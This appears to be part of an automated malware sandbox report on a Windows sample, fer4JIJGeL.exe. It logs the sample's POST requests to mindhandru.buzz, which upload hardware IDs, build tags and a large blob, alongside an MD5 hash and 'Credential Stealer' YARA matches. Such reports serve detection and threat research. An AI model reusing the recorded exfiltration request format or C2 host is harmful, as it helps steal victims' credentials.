2024-12-27 08:00:23 UTC | 15015 | OUT | Data Raw: 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
Data Ascii: --3PQAHZZ6Content-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--3PQAHZZ6Content-Disposition: form-data; name="pid"2--3PQAHZZ6Content-Disposition: form-data; name="lid"PsFKDg--pablo--3PQAHZZ6Content-Disposit
2024-12-27 08:00:23 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8t9dm630aa4m6kcsb4kdtm0vvm; expires=Tue, 22 Apr 2025 01:47:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5ercTzvA3TLZQxUxMITLu3zOjlbJ%2B7bDciAExiYwjV9R1bfL0muL9fnLO3gQm8%2FSKHFyNfWQwTIjc4MyjnfhTLmfTAt6lgZCnfwBdGJ0ZTu%2FSuiG1QeuGOsZYvih9zjycQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6d13dd37271-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1810&rtt_var=684&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15944&delivery_rate=1594756&cwnd=225&unsent_bytes=0&cid=c5ea1662ed74f33c&ts=822&x=0"
2024-12-27 08:00:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 08:00:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49709 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:25 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5T8PG350TZ5RDHECV6F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20248
Host: mindhandru.buzz
2024-12-27 08:00:25 UTC | 15331 | OUT | Data Raw: 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="pid"3--5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-27 08:00:25 UTC | 4917 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0
Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8
2024-12-27 08:00:26 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1pb5ccmrvqi8eqd3p23mc74vko; expires=Tue, 22 Apr 2025 01:47:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2Fj%2FwwixGomfS%2FVtbwEPod2oSS%2FP6FnaDSOAGJcihUU%2BkQw1ySu%2BLd9pTl8oanQQLw3rB1qvbqsKiJfe6e9K2%2Bb0xqEilUPL9k6dIsBPfLpC9PMp01K2VzRFD2fGGhi53k0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6dfab7641e1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1738&rtt_var=658&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21210&delivery_rate=1654390&cwnd=243&unsent_bytes=0&cid=34cff4e0f0d2a903&ts=990&x=0"
2024-12-27 08:00:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 08:00:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49710 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:27 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LK7TWOIGHFY18V46CV8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1241
Host: mindhandru.buzz
2024-12-27 08:00:27 UTC | 1241 | OUT | Data Raw: 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="pid"1--LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-27 08:00:29 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fe7fpm6hb2hic8dmceaamf5d70; expires=Tue, 22 Apr 2025 01:47:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=miOi6SzOGpzY3UprTFKjEA1dIv%2FiE%2FSBBMiGW4kuXKTYeknrefVcPfQO3qTpUfKc7JNKXZEK7DOoUP4QPz3C36nLcBZiAnvVEKfBIg9jYfAUhPj%2FuprWOHAI%2Bs4OUKlruy8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6f0287841a1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2457&rtt_var=937&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2158&delivery_rate=1158270&cwnd=229&unsent_bytes=0&cid=1c75957329e68fbe&ts=1452&x=0"
                                                                                                              2024-12-27 08:00:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:00:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              6 | 192.168.2.8 | 49711 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-27 08:00:31 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=0WACV1U001
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 551961
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:31 UTC | 15331 | OUT
                                                                                                              Data Ascii:
                                                                                                                  --0WACV1U001
                                                                                                                  Content-Disposition: form-data; name="hwid"

                                                                                                                  17506EB641BD76F1BEBA0C6A975F1733
                                                                                                                  --0WACV1U001
                                                                                                                  Content-Disposition: form-data; name="pid"

                                                                                                                  1
                                                                                                                  --0WACV1U001
                                                                                                                  Content-Disposition: form-data; name="lid"

                                                                                                                  PsFKDg--pablo
                                                                                                                  --0WACV1U001
                                                                                                                  Content-
                                                                                                              2024-12-27 08:00:33 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:33 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ibsvtd19i9uhi9dusrt5qse3bm; expires=Tue, 22 Apr 2025 01:47:12 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S99TPR3Mo0mmvH0uF3t9zKgZUIz8B5edoR2FyNn2a%2FWsk7yMzHorw0cC60iLUpkRWT7q5CFMSUTQazI0dbS6S6x8E1Mi1Kxy0CEJ1zzdT2fZs8%2B9ID9e4CkCYm7A8BIoqRc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c7040f02c413-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1622&rtt_var=624&sent=350&recv=580&lost=0&retrans=0&sent_bytes=2838&recv_bytes=554455&delivery_rate=1732937&cwnd=173&unsent_bytes=0&cid=de24190267e540a2&ts=2437&x=0"



                                                                                                              Target ID: 0
                                                                                                              Start time: 03:00:12
                                                                                                              Start date: 27/12/2024
                                                                                                              Path: C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              Wow64 process (32bit): true
                                                                                                              Commandline: "C:\Users\user\Desktop\fer4JIJGeL.exe"
                                                                                                              Imagebase: 0xc30000
                                                                                                              File size: 1'854'976 bytes
                                                                                                              MD5 hash: 0D3B04489BAA22C2F702C549466B64F4
                                                                                                              Has elevated privileges: true
                                                                                                              Has administrator privileges: true
                                                                                                              Programmed in: C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1538148540.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1537765553.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation: low
                                                                                                              Has exited: true

                                                                                                              No disassembly